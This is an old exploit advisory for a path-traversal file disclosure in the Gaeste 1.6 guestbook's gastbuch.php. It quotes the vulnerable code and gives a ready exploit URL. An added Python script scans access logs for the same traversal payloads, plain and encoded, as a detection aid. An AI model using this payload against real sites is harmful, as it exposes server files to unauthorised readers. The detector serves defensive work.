++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                                                                +
+ Gaeste 1.6 (gastbuch.php) Remote File Disclosure Vulnerability +
+                                                                +
+                       bd0rk || SOH-Crew                        +
+                                                                +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
=> Vendor: http://www.php4scripte.de/
=> Download: http://www.php4scripte.de/download/gastbuchxhtml16.zip
=> Bugfound3R: bd0rk
=> Greetz: str0ke, TheJT, TheAJ, kretzi, DarkFig, Perforin ;-)
=> Vulnerable code in gastbuch.php, lines 2-3
-------------------------------
if (isset($_GET['start'])) {
$start=$_GET['start'];
-------------------------------
[+]XPL0iT: http://[t4rg3t]/[gaestepath]/gastbuch.php?start=../../TARGETFILE.php
###The 20-year-old German hacker bd0rk###
# milw0rm.com [2009-02-09]
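
Added example (not part of the original advisory or the Gaeste code): a log check for the issue above that reports requests to gastbuch.php whose start parameter is not a plain non-negative integer. It assumes start is meant to be a numeric paging offset and that the web server writes common log format; the sample lines, IPs and the /gb/ path are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (common log format); IPs and the /gb/ path are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [09/Feb/2009:10:00:01 +0100] "GET /gb/gastbuch.php?start=10 HTTP/1.1" 200 5120
203.0.113.9 - - [09/Feb/2009:10:00:07 +0100] "GET /gb/gastbuch.php?start=../../TARGETFILE.php HTTP/1.1" 200 842
203.0.113.9 - - [09/Feb/2009:10:00:09 +0100] "GET /gb/gastbuch.php?start=..%2F..%2FTARGETFILE.php HTTP/1.1" 200 842
198.51.100.2 - - [09/Feb/2009:10:01:00 +0100] "GET /gb/gastbuch.php HTTP/1.1" 200 5120
198.51.100.2 - - [09/Feb/2009:10:01:02 +0100] "GET /gb/other.php?start=../x HTTP/1.1" 404 0
198.51.100.7 - - [09/Feb/2009:10:02:00 +0100] "GET /gb/gastbuch.php?start=abc HTTP/1.1" 200 5120
"""

# client ident user [time] "METHOD target PROTO" status ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')
DIGITS_RE = re.compile(r"[0-9]+")


def suspicious_start_requests(log_text, script="gastbuch.php"):
    """Return (client, status, value, reason) for each request to `script`
    whose `start` parameter is not a plain non-negative integer."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a parsable request line
        client, target, status = m.groups()
        url = urlsplit(target)
        if url.path.rsplit("/", 1)[-1] != script:
            continue  # a different script; out of scope for this check
        # parse_qsl percent-decodes once, so %2F and / compare equal here.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key != "start" or DIGITS_RE.fullmatch(value):
                continue
            # Allowlist: anything that is not digits is reported; the reason
            # label only helps triage.
            traversal = ".." in value.replace("\\", "/").split("/")
            reason = "path-traversal" if traversal else "non-numeric"
            findings.append((client, int(status), value, reason))
    return findings


if __name__ == "__main__":
    for finding in suspicious_start_requests(SAMPLE_LOG):
        print(finding)
```

A flagged request that returned status 200 is the one to triage first, since the server answered it rather than rejecting it.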